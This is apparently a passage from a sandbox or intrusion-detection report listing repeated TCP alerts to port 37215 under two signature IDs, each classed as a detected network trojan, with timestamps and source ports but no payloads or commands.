                Timestamp:05/29/24-15:16:28.023466
                SID:2835222
                Source Port:38644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519731
                SID:2829579
                Source Port:58428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832938
                SID:2835222
                Source Port:59360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013808
                SID:2829579
                Source Port:37318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506975
                SID:2829579
                Source Port:42058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038518
                SID:2829579
                Source Port:53790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597493
                SID:2829579
                Source Port:40622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872496
                SID:2829579
                Source Port:47646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717187
                SID:2829579
                Source Port:52264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.983377
                SID:2835222
                Source Port:37678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442616
                SID:2829579
                Source Port:57110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726252
                SID:2835222
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782925
                SID:2829579
                Source Port:34974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583734
                SID:2835222
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287950
                SID:2829579
                Source Port:51944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.934881
                SID:2835222
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787115
                SID:2835222
                Source Port:34708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459035
                SID:2829579
                Source Port:43886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651671
                SID:2835222
                Source Port:39692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421931
                SID:2829579
                Source Port:33418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840340
                SID:2835222
                Source Port:58766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472186
                SID:2829579
                Source Port:38682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804957
                SID:2835222
                Source Port:34594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.976029
                SID:2835222
                Source Port:51918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669335
                SID:2829579
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653642
                SID:2835222
                Source Port:58120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286617
                SID:2829579
                Source Port:59126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617679
                SID:2835222
                Source Port:42346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227146
                SID:2829579
                Source Port:47168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779426
                SID:2835222
                Source Port:37762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701594
                SID:2835222
                Source Port:40526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510982
                SID:2829579
                Source Port:49406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734315
                SID:2835222
                Source Port:34350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686775
                SID:2829579
                Source Port:57708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843785
                SID:2829579
                Source Port:49526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463227
                SID:2835222
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846524
                SID:2829579
                Source Port:47574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512585
                SID:2829579
                Source Port:51910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914955
                SID:2829579
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951265
                SID:2835222
                Source Port:41814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869616
                SID:2829579
                Source Port:54774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798661
                SID:2829579
                Source Port:46554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042759
                SID:2835222
                Source Port:52300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997458
                SID:2829579
                Source Port:58360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852245
                SID:2829579
                Source Port:59582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288322
                SID:2835222
                Source Port:35852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969753
                SID:2829579
                Source Port:41512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175073
                SID:2835222
                Source Port:40818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227388
                SID:2829579
                Source Port:50374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967589
                SID:2829579
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573919
                SID:2835222
                Source Port:59582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221739
                SID:2829579
                Source Port:34382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654991
                SID:2835222
                Source Port:41020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163982
                SID:2829579
                Source Port:52816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813170
                SID:2835222
                Source Port:37314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670391
                SID:2835222
                Source Port:36892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882368
                SID:2829579
                Source Port:37658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503637
                SID:2835222
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.714396
                SID:2835222
                Source Port:41650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039829
                SID:2829579
                Source Port:38050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339018
                SID:2829579
                Source Port:34340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675488
                SID:2829579
                Source Port:60800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855071
                SID:2829579
                Source Port:55280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076433
                SID:2829579
                Source Port:33672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509741
                SID:2835222
                Source Port:49336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903952
                SID:2835222
                Source Port:36666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811929
                SID:2835222
                Source Port:57372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663395
                SID:2835222
                Source Port:50028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223863
                SID:2835222
                Source Port:48838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688269
                SID:2829579
                Source Port:38894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236048
                SID:2829579
                Source Port:39412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465389
                SID:2829579
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223981
                SID:2829579
                Source Port:60736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583081
                SID:2835222
                Source Port:54968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165421
                SID:2835222
                Source Port:40026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521816
                SID:2829579
                Source Port:46124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160336
                SID:2835222
                Source Port:60344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027321
                SID:2829579
                Source Port:56908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128926
                SID:2835222
                Source Port:50420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610940
                SID:2835222
                Source Port:34216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416610
                SID:2829579
                Source Port:42854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848957
                SID:2829579
                Source Port:57148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227889
                SID:2829579
                Source Port:35674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330186
                SID:2835222
                Source Port:45598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779392
                SID:2829579
                Source Port:46866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899676
                SID:2835222
                Source Port:37178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135953
                SID:2829579
                Source Port:43394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518934
                SID:2829579
                Source Port:53792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.577248
                SID:2829579
                Source Port:38726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716518
                SID:2835222
                Source Port:51976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712827
                SID:2829579
                Source Port:52194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947767
                SID:2829579
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184075
                SID:2829579
                Source Port:46676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436115
                SID:2835222
                Source Port:51700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467471
                SID:2829579
                Source Port:60824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818067
                SID:2835222
                Source Port:56650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660378
                SID:2829579
                Source Port:58870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896218
                SID:2829579
                Source Port:54948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790684
                SID:2835222
                Source Port:33858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.436863
                SID:2835222
                Source Port:47854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415829
                SID:2835222
                Source Port:43554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385105
                SID:2835222
                Source Port:38878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711417
                SID:2829579
                Source Port:47690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884060
                SID:2829579
                Source Port:53018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796236
                SID:2829579
                Source Port:54024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557713
                SID:2829579
                Source Port:50406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727035
                SID:2835222
                Source Port:49838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966541
                SID:2835222
                Source Port:58018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571480
                SID:2835222
                Source Port:58510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732966
                SID:2829579
                Source Port:57330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617620
                SID:2835222
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417794
                SID:2829579
                Source Port:43506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666363
                SID:2835222
                Source Port:40236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503426
                SID:2835222
                Source Port:49278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914236
                SID:2835222
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022358
                SID:2835222
                Source Port:43230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984775
                SID:2829579
                Source Port:49446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675367
                SID:2829579
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015530
                SID:2829579
                Source Port:52960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179085
                SID:2835222
                Source Port:43592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000937
                SID:2829579
                Source Port:43870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849340
                SID:2829579
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287811
                SID:2829579
                Source Port:39628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321075
                SID:2835222
                Source Port:48524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655247
                SID:2835222
                Source Port:43884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959705
                SID:2835222
                Source Port:51702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.933356
                SID:2829579
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364706
                SID:2835222
                Source Port:33796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570629
                SID:2829579
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906351
                SID:2829579
                Source Port:35178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281204
                SID:2829579
                Source Port:51694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225350
                SID:2829579
                Source Port:46288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652581
                SID:2835222
                Source Port:37404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517785
                SID:2829579
                Source Port:49480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.452082
                SID:2835222
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225261
                SID:2835222
                Source Port:50472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773299
                SID:2835222
                Source Port:36562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855751
                SID:2829579
                Source Port:45928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331378
                SID:2829579
                Source Port:36622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848689
                SID:2835222
                Source Port:59434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891294
                SID:2829579
                Source Port:33912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971783
                SID:2829579
                Source Port:50758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559000
                SID:2835222
                Source Port:58932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421878
                SID:2835222
                Source Port:59460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716099
                SID:2835222
                Source Port:57888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361542
                SID:2829579
                Source Port:49746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441947
                SID:2835222
                Source Port:60288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951616
                SID:2829579
                Source Port:44266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586370
                SID:2829579
                Source Port:33054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844775
                SID:2829579
                Source Port:42824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882829
                SID:2829579
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815496
                SID:2829579
                Source Port:33304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617191
                SID:2829579
                Source Port:37260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287968
                SID:2829579
                Source Port:52086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732427
                SID:2829579
                Source Port:34946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502499
                SID:2829579
                Source Port:48928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859342
                SID:2829579
                Source Port:33646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287942
                SID:2835222
                Source Port:34366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149259
                SID:2835222
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992914
                SID:2829579
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786847
                SID:2835222
                Source Port:52114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022446
                SID:2835222
                Source Port:55536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584802
                SID:2829579
                Source Port:45862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035335
                SID:2835222
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628834
                SID:2835222
                Source Port:55736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903438
                SID:2835222
                Source Port:50276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154338
                SID:2835222
                Source Port:60746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813430
                SID:2835222
                Source Port:52688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161245
                SID:2835222
                Source Port:34286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464018
                SID:2829579
                Source Port:42724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212284
                SID:2835222
                Source Port:54362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667821
                SID:2829579
                Source Port:57004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181581
                SID:2835222
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522812
                SID:2835222
                Source Port:58928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275327
                SID:2829579
                Source Port:40146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670370
                SID:2835222
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009265
                SID:2835222
                Source Port:34184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856991
                SID:2835222
                Source Port:51180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783885
                SID:2835222
                Source Port:33404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783328
                SID:2829579
                Source Port:49298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931511
                SID:2829579
                Source Port:49024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225527
                SID:2835222
                Source Port:52600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730302
                SID:2835222
                Source Port:34568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779554
                SID:2829579
                Source Port:39214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522934
                SID:2835222
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722712
                SID:2829579
                Source Port:56628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787615
                SID:2829579
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372210
                SID:2835222
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731879
                SID:2829579
                Source Port:41572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993850
                SID:2835222
                Source Port:41082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981703
                SID:2829579
                Source Port:36274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518400
                SID:2835222
                Source Port:40378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024379
                SID:2829579
                Source Port:43166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559346
                SID:2835222
                Source Port:33562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386174
                SID:2835222
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860184
                SID:2829579
                Source Port:52284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211957
                SID:2835222
                Source Port:45334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422323
